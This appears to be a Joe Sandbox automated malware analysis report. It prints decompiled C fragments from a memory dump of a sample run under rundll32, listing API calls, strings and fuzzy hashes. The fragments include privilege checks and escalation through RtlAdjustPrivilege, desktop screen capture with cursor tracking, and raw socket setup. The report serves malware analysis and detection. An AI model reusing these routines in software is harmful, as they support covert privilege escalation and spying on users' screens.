                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 75%
                                                            			E0464ADD0(WCHAR* __ecx, void* __esi) {
                                                            				signed int _v8;
                                                            				intOrPtr _v12;
                                                            				WCHAR* _v16;
                                                            				struct _PRIVILEGE_SET _v28;
                                                            				int _v32;
                                                            				void* _v36;
                                                            				struct _LUID _v44;
                                                            				signed int _t21;
                                                            				WCHAR* _t39;
                                                            				signed int _t40;
                                                            
                                                            				_t21 =  *0x4684008; // 0xd355be4e
                                                            				_v8 = _t21 ^ _t40;
                                                            				_v44.LowPart = 0;
                                                            				asm("xorps xmm0, xmm0");
                                                            				_v44.HighPart = 0;
                                                            				_t39 = __ecx;
                                                            				_v28.PrivilegeCount = 0;
                                                            				asm("movups [ebp-0x14], xmm0");
                                                            				_v32 = 0;
                                                            				_v36 = 0;
                                                            				if(OpenProcessToken(GetCurrentProcess(), 8,  &_v36) != 0) {
                                                            					LookupPrivilegeValueW(0, _t39,  &_v44);
                                                            					_v28.Privilege = _v44.LowPart;
                                                            					_v16 = _v44.HighPart;
                                                            					_v28.Control = 1;
                                                            					_v28.PrivilegeCount = 1;
                                                            					_v12 = 2;
                                                            					PrivilegeCheck(_v36,  &_v28,  &_v32);
                                                            				}
                                                            				return E04655AFE(_v8 ^ _t40);
                                                            			}

                                                            APIs
                                                            • GetCurrentProcess.KERNEL32(00000008,?), ref: 0464AE13
                                                            • OpenProcessToken.ADVAPI32(00000000), ref: 0464AE1A
                                                            • LookupPrivilegeValueW.ADVAPI32(00000000,SeTcbPrivilege,00000000), ref: 0464AE2B
                                                            • PrivilegeCheck.ADVAPI32(00000000,00000000,00000000), ref: 0464AE5D
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: PrivilegeProcess$CheckCurrentLookupOpenTokenValue
                                                            • String ID: SeTcbPrivilege
                                                            • API String ID: 3991982149-1502394177
                                                            • Opcode ID: 63f7a8a7a4ab260870a55024c5caa2dca862611b0b18182305db1be0a97797d8
                                                            • Instruction ID: fba1e486256413da8b4b373c7d516d6b2806e52ebbde8f289b7325d080911006
                                                            • Opcode Fuzzy Hash: 63f7a8a7a4ab260870a55024c5caa2dca862611b0b18182305db1be0a97797d8
                                                            • Instruction Fuzzy Hash: 9211F8B1D0020D9BDB00CF94D888BEEBBF8FF08314F105159E905B2240EBB96A448FA4
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 100%
                                                            			E04632500(void* __ecx) {
                                                            				void* _t7;
                                                            				void* _t8;
                                                            				struct HWND__* _t9;
                                                            				struct HWND__* _t13;
                                                            				void* _t16;
                                                            
                                                            				_t16 = __ecx;
                                                            				_t7 = CreateEventW(0, 0, 0, 0);
                                                            				 *(_t16 + 0xc0) = _t7;
                                                            				if(_t7 == 0) {
                                                            					L3:
                                                            					_t8 =  *(_t16 + 0xc0);
                                                            					if(_t8 != 0) {
                                                            						CloseHandle(_t8);
                                                            						 *(_t16 + 0xc0) = 0;
                                                            					}
                                                            					_t9 =  *(_t16 + 0xc4);
                                                            					if(_t9 != 0) {
                                                            						CloseWindow(_t9);
                                                            						 *(_t16 + 0xc4) = 0;
                                                            					}
                                                            					return 0;
                                                            				} else {
                                                            					_t13 = CreateWindowExA(0, "#32770", 0x467d888, 0x80000000, 0, 0, 0, 0, 0, 0, 0, 0);
                                                            					 *(_t16 + 0xc4) = _t13;
                                                            					if(_t13 == 0) {
                                                            						goto L3;
                                                            					} else {
                                                            						return 1;
                                                            					}
                                                            				}
                                                            			}

                                                            APIs
                                                            • CreateEventW.KERNEL32(00000000,00000000,00000000,00000000,?,04648072), ref: 0463250B
                                                            • CreateWindowExA.USER32(00000000,#32770,0467D888,80000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0463253C
                                                            • CloseHandle.KERNEL32(?), ref: 0463255E
                                                            • CloseWindow.USER32(?), ref: 04632579
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: CloseCreateWindow$EventHandle
                                                            • String ID: #32770
                                                            • API String ID: 1958951703-463685578
                                                            • Opcode ID: c34b5ddedb5e50d8a06fe739ff1c5027d90d453cb17e1d4c35864d3eed76ee18
                                                            • Instruction ID: 056798f22117f4bb48d690e0e69abbb1df6da33bbf9381d3163ade7d4ac02615
                                                            • Opcode Fuzzy Hash: c34b5ddedb5e50d8a06fe739ff1c5027d90d453cb17e1d4c35864d3eed76ee18
                                                            • Instruction Fuzzy Hash: 13F0E730381701ABF7349B35AC29F8676E4EB10722F100A59F51AE72C0EBB8E9008A50
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 15%
                                                            			E0463D360(intOrPtr* __ecx, char _a4) {
                                                            				void* __esi;
                                                            				char _t9;
                                                            				_Unknown_base(*)()* _t12;
                                                            				char* _t18;
                                                            				intOrPtr* _t20;
                                                            
                                                            				_t18 = __ecx;
                                                            				_t9 = _a4;
                                                            				_t20 = __ecx;
                                                            				 *__ecx = 0x467e8b0;
                                                            				 *((intOrPtr*)(__ecx + 4)) = _t9;
                                                            				 *((intOrPtr*)(_t9 + 0x38)) = __ecx;
                                                            				 *((intOrPtr*)(_t20 + 8)) = CreateEventW(0, 1, 0, 0);
                                                            				 *_t20 = 0x467e97c;
                                                            				_t12 = GetProcAddress(LoadLibraryA("ntdll.dll"), "RtlAdjustPrivilege");
                                                            				if(_t12 == 0) {
                                                            					E0464AD30(_t20);
                                                            				} else {
                                                            					_t18 =  &_a4;
                                                            					 *_t12(0x14, 1, 0, _t18);
                                                            				}
                                                            				_push(_t18);
                                                            				_push(0x3f);
                                                            				_push(1);
                                                            				_push( &_a4);
                                                            				_a4 = 0x8d;
                                                            				E04631C60( *((intOrPtr*)(_t20 + 4)));
                                                            				return _t20;
                                                            			}

                                                            APIs
                                                            • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,?,0463922C,?,046878D8,00000000), ref: 0463D37D
                                                            • LoadLibraryA.KERNEL32(ntdll.dll,?,?,0463922C,?,046878D8,00000000), ref: 0463D391
                                                            • GetProcAddress.KERNEL32(00000000,RtlAdjustPrivilege), ref: 0463D39D
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: AddressCreateEventLibraryLoadProc
                                                            • String ID: RtlAdjustPrivilege$ntdll.dll
                                                            • API String ID: 3086787778-64178277
                                                            • Opcode ID: 556a37c1bd1f39e5c1018277be13a2d330f36b4d5e2f4e143890b40e9f678b3c
                                                            • Instruction ID: 3a2f95e013d036d2b775009b43accc2cfa9be6dd33ce559664cce26f06906ebb
                                                            • Opcode Fuzzy Hash: 556a37c1bd1f39e5c1018277be13a2d330f36b4d5e2f4e143890b40e9f678b3c
                                                            • Instruction Fuzzy Hash: B4016271380705BFE7249FA4DC4AF967A94EF18B51F00441DF2599A1C0FAB4B540C7A5
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,0465F3B5,?,?,0465F355,?,04681730,0000000C,0465F488,00000000,00000000), ref: 0465F424
                                                            • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0465F437
                                                            • FreeLibrary.KERNEL32(00000000,?,?,?,0465F3B5,?,?,0465F355,?,04681730,0000000C,0465F488,00000000,00000000,00000001,0465625B), ref: 0465F45A
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: AddressFreeHandleLibraryModuleProc
                                                            • String ID: CorExitProcess$mscoree.dll
                                                            • API String ID: 4061214504-1276376045
                                                            • Opcode ID: c0d23720ea4ae0543b5c62f7bb331aca26250a3d704d39c6929595df641fecf2
                                                            • Instruction ID: 0ec2ca854fc385f1de3537753f70851c1dbcbf4cca0a6276fb4e62f0ece68844
                                                            • Opcode Fuzzy Hash: c0d23720ea4ae0543b5c62f7bb331aca26250a3d704d39c6929595df641fecf2
                                                            • Instruction Fuzzy Hash: CDF0443560021DBBCB159F95D84DBADBBB4EF44715F004158F809A2251FF746D44CA95
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                              • Part of subcall function 0464D020: StrChrW.SHLWAPI(?,0000003A), ref: 0464D044
                                                            • WSASetLastError.WS2_32(0000273F,?,?), ref: 0464EFD6
                                                              • Part of subcall function 0464D0D0: WSASetLastError.WS2_32(00002741), ref: 0464D0FA
                                                            • socket.WS2_32(00000000,00000001,00000006), ref: 0464EFF9
                                                            • WSAIoctl.WS2_32(00000000,98000004,?,0000000C,00000000,00000000,?,00000000,00000000), ref: 0464F043
                                                            • WSAGetLastError.WS2_32 ref: 0464F04E
                                                            • WSACreateEvent.WS2_32 ref: 0464F06E
                                                              • Part of subcall function 04637AC0: RaiseException.KERNEL32(C000001D,00000001,00000000,00000000,?,046383DB,80004005,?,046387F8,04638B6E,00000000,?), ref: 04637ADE
                                                              • Part of subcall function 04637AC0: RtlEnterCriticalSection.NTDLL(?), ref: 0464FA53
                                                              • Part of subcall function 04637AC0: RtlLeaveCriticalSection.NTDLL(?), ref: 0464FA7B
                                                              • Part of subcall function 04637AC0: SetLastError.KERNEL32(0000139F,?,046383DB,80004005,?,046387F8,04638B6E,00000000,?), ref: 0464FA87
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: ErrorLast$CriticalSection$CreateEnterEventExceptionIoctlLeaveRaisesocket
                                                            • String ID:
                                                            • API String ID: 688454317-0
                                                            • Opcode ID: b5b2c7d4cf02fd5ab1aa5e9843c7339788d7cd95dadbb25aec7ad150944cbec9
                                                            • Instruction ID: 17f4c7526389cd006db7b30fb1e849447802673e02fd50b2d598c942c66ca98b
                                                            • Opcode Fuzzy Hash: b5b2c7d4cf02fd5ab1aa5e9843c7339788d7cd95dadbb25aec7ad150944cbec9
                                                            • Instruction Fuzzy Hash: A141B175A00209ABEF24DF64E880BAE77A5EFC4714F10412EEA06D7381FB75B941CB65
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 90%
                                                            			E04642760(void* __ecx, void* __esi, int* _a4) {
                                                            				struct tagPOINT _v12;
                                                            				void* __ebx;
                                                            				void* __edi;
                                                            				intOrPtr _t59;
                                                            				signed int _t66;
                                                            				signed int _t67;
                                                            				struct HWND__* _t77;
                                                            				int* _t79;
                                                            				void* _t90;
                                                            				void* _t91;
                                                            				signed int _t92;
                                                            				void* _t93;
                                                            				signed int _t94;
                                                            
                                                            				_t91 = __esi;
                                                            				_t79 = _a4;
                                                            				_t90 = __ecx;
                                                            				if(_t79 == 0 ||  *((intOrPtr*)(__ecx + 0x14)) == 0) {
                                                            					__eflags = 0;
                                                            					return 0;
                                                            				} else {
                                                            					if(E04645570(_t79, __ecx, __esi) != 0) {
                                                            						ReleaseDC( *(_t90 + 0x104),  *(_t90 + 0x3c));
                                                            						_t77 = GetDesktopWindow();
                                                            						 *(_t90 + 0x104) = _t77;
                                                            						 *(_t90 + 0x3c) = GetDC(_t77);
                                                            					}
                                                            					 *(_t90 + 0x18) = 0;
                                                            					 *((char*)( *((intOrPtr*)(_t90 + 0x14)))) =  *((intOrPtr*)(_t90 + 4));
                                                            					 *(_t90 + 0x18) =  *(_t90 + 0x18) + 1;
                                                            					GetCursorPos( &_v12);
                                                            					asm("movq xmm0, [ebp-0x8]");
                                                            					asm("movq [eax], xmm0");
                                                            					 *(_t90 + 0x18) =  *(_t90 + 0x18) + 8;
                                                            					 *((char*)( *((intOrPtr*)(_t90 + 0x14)) +  *(_t90 + 0x18))) = E04642370(_t90 + 0x80);
                                                            					 *(_t90 + 0x18) =  *(_t90 + 0x18) + 1;
                                                            					if( *((char*)(_t90 + 4)) != 2) {
                                                            						_t59 = _v12.y;
                                                            						_push(_t91);
                                                            						_t92 = _t59 - 0x13;
                                                            						__eflags = _t92;
                                                            						_t93 =  <  ? 0 : _t92;
                                                            						__eflags = _t59 -  *0x4687b1c; // 0x0
                                                            						if(__eflags == 0) {
                                                            							L9:
                                                            							_t94 =  *(_t90 + 0x28);
                                                            						} else {
                                                            							_t67 = L04642B10(_t90, _t93);
                                                            							__eflags = _t67;
                                                            							if(_t67 == 0) {
                                                            								goto L9;
                                                            							} else {
                                                            								_t94 = _t93 + 0x13;
                                                            							}
                                                            						}
                                                            						__eflags = _t94 -  *((intOrPtr*)(_t90 + 0x24));
                                                            						while(_t94 <  *((intOrPtr*)(_t90 + 0x24))) {
                                                            							_t66 = L04642B10(_t90, _t94);
                                                            							__eflags = _t66;
                                                            							if(_t66 != 0) {
                                                            								_t94 = _t94 + 0x13;
                                                            								__eflags = _t94;
                                                            							}
                                                            							_t94 = _t94 + 0x13;
                                                            							__eflags = _t94 -  *((intOrPtr*)(_t90 + 0x24));
                                                            						}
                                                            						 *0x4687b1c = _v12.y;
                                                            						asm("cdq");
                                                            						_t45 = ( *(_t90 + 0x28) + 3) % 0x13;
                                                            						__eflags = _t45;
                                                            						 *_t79 =  *(_t90 + 0x18);
                                                            						 *(_t90 + 0x28) = _t45;
                                                            						return  *((intOrPtr*)(_t90 + 0x14));
                                                            					} else {
                                                            						BitBlt( *(_t90 + 0x78), 0, 0,  *( *((intOrPtr*)(_t90 + 0x60)) + 4),  *( *((intOrPtr*)(_t90 + 0x60)) + 8),  *(_t90 + 0x3c), 0, 0,  *(_t90 + 0x10));
                                                            						 *_t79 = E04636F00( *((intOrPtr*)(_t90 + 0x70)),  *((intOrPtr*)(_t90 + 0x58)),  *((intOrPtr*)(_t90 + 0x14)) +  *(_t90 + 0x18),  *((intOrPtr*)( *((intOrPtr*)(_t90 + 0x60)) + 0x14))) +  *(_t90 + 0x18);
                                                            						return  *((intOrPtr*)(_t90 + 0x14));
                                                            					}
                                                            				}
                                                            			}
                                                            0x046427f6

                                                            APIs
                                                              • Part of subcall function 04645570: GetCurrentThreadId.KERNEL32 ref: 04645588
                                                              • Part of subcall function 04645570: GetThreadDesktop.USER32(00000000), ref: 0464558F
                                                              • Part of subcall function 04645570: GetUserObjectInformationA.USER32(00000000,00000002,?,00000100,?), ref: 046455CF
                                                              • Part of subcall function 04645570: OpenInputDesktop.USER32(00000000,00000000,02000000), ref: 046455DA
                                                              • Part of subcall function 04645570: GetUserObjectInformationA.USER32(00000000,00000002,?,00000100,?), ref: 0464560E
                                                              • Part of subcall function 04645570: lstrcmpi.KERNEL32(?,?), ref: 0464561E
                                                              • Part of subcall function 04645570: SetThreadDesktop.USER32(00000000), ref: 04645629
                                                              • Part of subcall function 04645570: CloseDesktop.USER32(?), ref: 0464563D
                                                              • Part of subcall function 04645570: CloseDesktop.USER32(00000000), ref: 04645640
                                                            • ReleaseDC.USER32(?,?), ref: 04642791
                                                            • GetDesktopWindow.USER32 ref: 04642797
                                                            • GetDC.USER32(00000000), ref: 046427A4
                                                              • Part of subcall function 04642B10: BitBlt.GDI32(00000000,00000000,00000000,?,00000001,?,00000000,00000000,?), ref: 04642B37
                                                              • Part of subcall function 04642B10: SetRect.USER32(?,000000FF,-00000013,000000FF,00000026), ref: 04642B60
                                                            • GetCursorPos.USER32(?), ref: 046427C3
                                                            • BitBlt.GDI32(?,00000000,00000000,00000002,?,?,00000000,00000000,?), ref: 04642812
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Desktop$Thread$CloseInformationObjectUser$CurrentCursorInputOpenRectReleaseWindowlstrcmpi
                                                            • String ID:
                                                            • API String ID: 1863377006-0
                                                            • Opcode ID: 725b39100e6141b370fbb704997912aed89d59e0ad582e9356724d0aa7cc92bd
                                                            • Instruction ID: 9aae1f27b406825531efd28640e29cd312bd5cc0f8ab06e5331b12f49ee88735
                                                            • Opcode Fuzzy Hash: 725b39100e6141b370fbb704997912aed89d59e0ad582e9356724d0aa7cc92bd
                                                            • Instruction Fuzzy Hash: 10417D72A00A02BFCB15DF69D894B64B7B1FF98314F140299E90497A11E731F8B5DBE4
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                              • Part of subcall function 0464D020: StrChrW.SHLWAPI(?,0000003A), ref: 0464D044
                                                            • WSASetLastError.WS2_32(0000273F,?,?), ref: 0464DAB6
                                                              • Part of subcall function 0464D0D0: WSASetLastError.WS2_32(00002741), ref: 0464D0FA
                                                            • socket.WS2_32(00000000,00000002,00000011), ref: 0464DAD9
                                                            • WSAIoctl.WS2_32(00000000,9800000C,00000000,00000004,00000000,00000000,00000000,00000000,00000000), ref: 0464DB06
                                                            • WSAGetLastError.WS2_32 ref: 0464DB11
                                                            • WSACreateEvent.WS2_32 ref: 0464DB31
                                                              • Part of subcall function 04637AC0: RaiseException.KERNEL32(C000001D,00000001,00000000,00000000,?,046383DB,80004005,?,046387F8,04638B6E,00000000,?), ref: 04637ADE
                                                              • Part of subcall function 04637AC0: RtlEnterCriticalSection.NTDLL(?), ref: 0464FA53
                                                              • Part of subcall function 04637AC0: RtlLeaveCriticalSection.NTDLL(?), ref: 0464FA7B
                                                              • Part of subcall function 04637AC0: SetLastError.KERNEL32(0000139F,?,046383DB,80004005,?,046387F8,04638B6E,00000000,?), ref: 0464FA87
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: ErrorLast$CriticalSection$CreateEnterEventExceptionIoctlLeaveRaisesocket
                                                            • String ID:
                                                            • API String ID: 688454317-0
                                                            • Opcode ID: d14edf72a1149ade1258fdfa6b1f525e8bc7fed32cd79d37db2d5a76007bb811
                                                            • Instruction ID: 895a9af0ed5b4a23b514107c752702b9c0c16aa53e759d634f4b41d6f099b807
                                                            • Opcode Fuzzy Hash: d14edf72a1149ade1258fdfa6b1f525e8bc7fed32cd79d37db2d5a76007bb811
                                                            • Instruction Fuzzy Hash: 55318F75E00209ABEF14EF64E888BAA73A5EF98314F10416EED16D72D0FB70B941CB55
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 30%
                                                            			E04638240(intOrPtr* __ebx, intOrPtr* __ecx, void* __edi, intOrPtr _a4, signed char _a8) {
                                                            				void* _t54;
                                                            				void* _t60;
                                                            				intOrPtr _t61;
                                                            				intOrPtr _t62;
                                                            				void* _t67;
                                                            				void* _t84;
                                                            				void* _t85;
                                                            				void* _t86;
                                                            				intOrPtr* _t89;
                                                            				struct _SECURITY_ATTRIBUTES** _t91;
                                                            				void* _t93;
                                                            				intOrPtr* _t94;
                                                            				intOrPtr* _t98;
                                                            				intOrPtr* _t99;
                                                            				intOrPtr* _t101;
                                                            				void* _t105;
                                                            				void* _t109;
                                                            
                                                            				_t89 = __ecx;
                                                            				_t88 = __ebx;
                                                            				_t105 = _t109;
                                                            				_t93 = CreateEventW;
                                                            				_t98 = __ecx;
                                                            				 *__ecx = 0x467e1b0;
                                                            				_t54 = CreateEventW(0, 1, 1, 0);
                                                            				 *(_t98 + 4) = _t54;
                                                            				if(_t54 == 0) {
                                                            					_push(0x80004005);
                                                            					E04637AC0();
                                                            					goto L7;
                                                            				} else {
                                                            					_t3 = _t98 + 0x5c; // 0x60
                                                            					_t91 = _t3;
                                                            					 *((intOrPtr*)(_t98 + 8)) = _a4;
                                                            					 *(_t98 + 0xc) = 1;
                                                            					 *((intOrPtr*)(_t98 + 0x10)) = 5;
                                                            					 *(_t98 + 0x14) = 0;
                                                            					 *(_t98 + 0x18) = 1;
                                                            					 *((intOrPtr*)(_t98 + 0x1c)) = 0xffffffff;
                                                            					 *(_t98 + 0x20) = 0;
                                                            					 *(_t98 + 0x24) = 0;
                                                            					 *(_t98 + 0x28) = 1;
                                                            					 *((intOrPtr*)(_t98 + 0x2c)) = 0x598;
                                                            					 *((intOrPtr*)(_t98 + 0x30)) = 0x3c;
                                                            					 *((intOrPtr*)(_t98 + 0x34)) = 0x3c;
                                                            					 *((intOrPtr*)(_t98 + 0x38)) = 3;
                                                            					 *((intOrPtr*)(_t98 + 0x3c)) = 0xea60;
                                                            					 *(_t98 + 0x40) = 0;
                                                            					 *(_t98 + 0x44) = 0;
                                                            					 *(_t98 + 0x48) = 0;
                                                            					 *(_t98 + 0x4c) = 0;
                                                            					 *((intOrPtr*)(_t98 + 0x50)) = 3;
                                                            					 *(_t98 + 0x54) = 0;
                                                            					 *(_t98 + 0x58) = 0;
                                                            					 *_t91 = 0;
                                                            					_t91[1] = 0;
                                                            					_t91[2] = 0;
                                                            					E0463ADA0(_t91, 0, _t91, 0);
                                                            					_t109 = _t109 - 0xc;
                                                            					_t27 = _t98 + 0x68; // 0x6c
                                                            					_t88 = _t27;
                                                            					_t89 = _t88;
                                                            					L0463ABB0(_t89, CreateEventW, __ebx);
                                                            					_t28 = _t98 + 0x14c; // 0x150
                                                            					 *(_t98 + 0x148) = 0;
                                                            					if(InitializeCriticalSectionAndSpinCount(_t28, 0) == 0) {
                                                            						L7:
                                                            						_push(0x80004005);
                                                            						E04637AC0();
                                                            						goto L8;
                                                            					} else {
                                                            						 *(_t98 + 0x168) = 0;
                                                            						 *(_t98 + 0x16c) = 0;
                                                            						 *(_t98 + 0x164) = 0;
                                                            						 *((intOrPtr*)(_t98 + 0x170)) = _t88;
                                                            						_t84 = CreateEventW(0, 0, 0, 0);
                                                            						 *(_t98 + 0x174) = _t84;
                                                            						_pop(_t88);
                                                            						if(_t84 == 0) {
                                                            							L8:
                                                            							_push(0x80004005);
                                                            							E04637AC0();
                                                            							goto L9;
                                                            						} else {
                                                            							_t85 = CreateEventW(0, 0, 0, 0);
                                                            							 *(_t98 + 0x178) = _t85;
                                                            							if(_t85 == 0) {
                                                            								L9:
                                                            								_push(0x80004005);
                                                            								E04637AC0();
                                                            								goto L10;
                                                            							} else {
                                                            								_t86 = CreateEventW(0, 0, 0, 0);
                                                            								 *(_t98 + 0x17c) = _t86;
                                                            								if(_t86 == 0) {
                                                            									L10:
                                                            									_push(0x80004005);
                                                            									E04637AC0();
                                                            									asm("int3");
                                                            									asm("int3");
                                                            									asm("int3");
                                                            									asm("int3");
                                                            									asm("int3");
                                                            									asm("int3");
                                                            									asm("int3");
                                                            									asm("int3");
                                                            									asm("int3");
                                                            									asm("int3");
                                                            									asm("int3");
                                                            									asm("int3");
                                                            									asm("int3");
                                                            									_push(_t98);
                                                            									_t99 = _t89;
                                                            									_push(_t93);
                                                            									 *_t99 = 0x467e1b0;
                                                            									if( *((intOrPtr*)(_t99 + 0x50)) != 3) {
                                                            										E0464E6F0(_t89);
                                                            									}
                                                            									_t60 =  *(_t99 + 0x17c);
                                                            									_t94 = CloseHandle;
                                                            									if(_t60 == 0 || CloseHandle(_t60) != 0) {
                                                            										_t61 =  *((intOrPtr*)(_t99 + 0x178));
                                                            										if(_t61 == 0) {
                                                            											L17:
                                                            											_t62 =  *((intOrPtr*)(_t99 + 0x174));
                                                            											if(_t62 == 0) {
                                                            												L19:
                                                            												E0463AC60(_t99 + 0x164);
                                                            												DeleteCriticalSection(_t99 + 0x14c);
                                                            												_t89 = _t99 + 0x68;
                                                            												E0463AB40(_t88, _t89);
                                                            												_t66 =  *(_t99 + 0x5c);
                                                            												if( *(_t99 + 0x5c) != 0) {
                                                            													L0465ED17(_t66);
                                                            													_t109 = _t109 + 4;
                                                            													 *(_t99 + 0x5c) = 0;
                                                            													 *(_t99 + 0x60) = 0;
                                                            													 *(_t99 + 0x64) = 0;
                                                            												}
                                                            												_t67 =  *(_t99 + 4);
                                                            												if(_t67 == 0) {
                                                            													L23:
                                                            													 *_t99 = 0x467dfa4;
                                                            													return _t67;
                                                            												} else {
                                                            													_t67 = CloseHandle(_t67);
                                                            													if(_t67 == 0) {
                                                            														goto L27;
                                                            													} else {
                                                            														goto L23;
                                                            													}
                                                            												}
                                                            											} else {
                                                            												_push(_t62);
                                                            												if( *_t94() == 0) {
                                                            													goto L26;
                                                            												} else {
                                                            													goto L19;
                                                            												}
                                                            											}
                                                            										} else {
                                                            											_push(_t61);
                                                            											if( *_t94() == 0) {
                                                            												goto L25;
                                                            											} else {
                                                            												goto L17;
                                                            											}
                                                            										}
                                                            									} else {
                                                            										_push(0x80004005);
                                                            										E04637AC0();
                                                            										L25:
                                                            										_push(0x80004005);
                                                            										E04637AC0();
                                                            										L26:
                                                            										_push(0x80004005);
                                                            										E04637AC0();
                                                            										L27:
                                                            										_push(0x80004005);
                                                            										E04637AC0();
                                                            										asm("int3");
                                                            										asm("int3");
                                                            										asm("int3");
                                                            										asm("int3");
                                                            										asm("int3");
                                                            										asm("int3");
                                                            										asm("int3");
                                                            										asm("int3");
                                                            										asm("int3");
                                                            										asm("int3");
                                                            										asm("int3");
                                                            										asm("int3");
                                                            										asm("int3");
                                                            										asm("int3");
                                                            										_push(_t105);
                                                            										_push(_t99);
                                                            										_t101 = _t89;
                                                            										L11();
                                                            										if((_a8 & 0x00000001) != 0) {
                                                            											_push(0x18c);
                                                            											E04655B47(_t101);
                                                            										}
                                                            										return _t101;
                                                            									}
                                                            								} else {
                                                            									 *(_t98 + 0x180) = 0;
                                                            									 *(_t98 + 0x184) = 0;
                                                            									 *(_t98 + 0x188) = 0;
                                                            									return _t98;
                                                            								}
                                                            							}
                                                            						}
                                                            					}
                                                            				}
                                                            			}
                                                            0x04638405
                                                            0x04638406
                                                            0x04638407
                                                            0x04638408
                                                            0x04638409
                                                            0x0463840a
                                                            0x0463840b
                                                            0x0463840c
                                                            0x0463840d
                                                            0x0463840e
                                                            0x0463840f
                                                            0x04638410
                                                            0x04638411
                                                            0x04638413
                                                            0x04638418
                                                            0x0463841e
                                                            0x04638420
                                                            0x04638420
                                                            0x04638425
                                                            0x0463842b
                                                            0x04638433
                                                            0x0463843c
                                                            0x04638444
                                                            0x0463844d
                                                            0x0463844d
                                                            0x04638455
                                                            0x0463845e
                                                            0x04638464
                                                            0x04638470
                                                            0x04638476
                                                            0x04638479
                                                            0x0463847e
                                                            0x04638483
                                                            0x04638486
                                                            0x0463848b
                                                            0x0463848e
                                                            0x04638495
                                                            0x0463849c
                                                            0x0463849c
                                                            0x046384a3
                                                            0x046384a8
                                                            0x046384b1
                                                            0x046384b2
                                                            0x046384b9
                                                            0x046384aa
                                                            0x046384ab
                                                            0x046384af
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x046384af
                                                            0x04638457
                                                            0x04638457
                                                            0x0463845c
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x0463845c
                                                            0x04638446
                                                            0x04638446
                                                            0x0463844b
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x0463844b
                                                            0x046384ba
                                                            0x046384ba
                                                            0x046384bf
                                                            0x046384c4
                                                            0x046384c4
                                                            0x046384c9
                                                            0x046384ce
                                                            0x046384ce
                                                            0x046384d3
                                                            0x046384d8
                                                            0x046384d8
                                                            0x046384dd
                                                            0x046384e2
                                                            0x046384e3
                                                            0x046384e4
                                                            0x046384e5
                                                            0x046384e6
                                                            0x046384e7
                                                            0x046384e8
                                                            0x046384e9
                                                            0x046384ea
                                                            0x046384eb
                                                            0x046384ec
                                                            0x046384ed
                                                            0x046384ee
                                                            0x046384ef
                                                            0x046384f0
                                                            0x046384f3
                                                            0x046384f4
                                                            0x046384f6
                                                            0x046384ff
                                                            0x04638501
                                                            0x04638507
                                                            0x0463850c
                                                            0x04638513
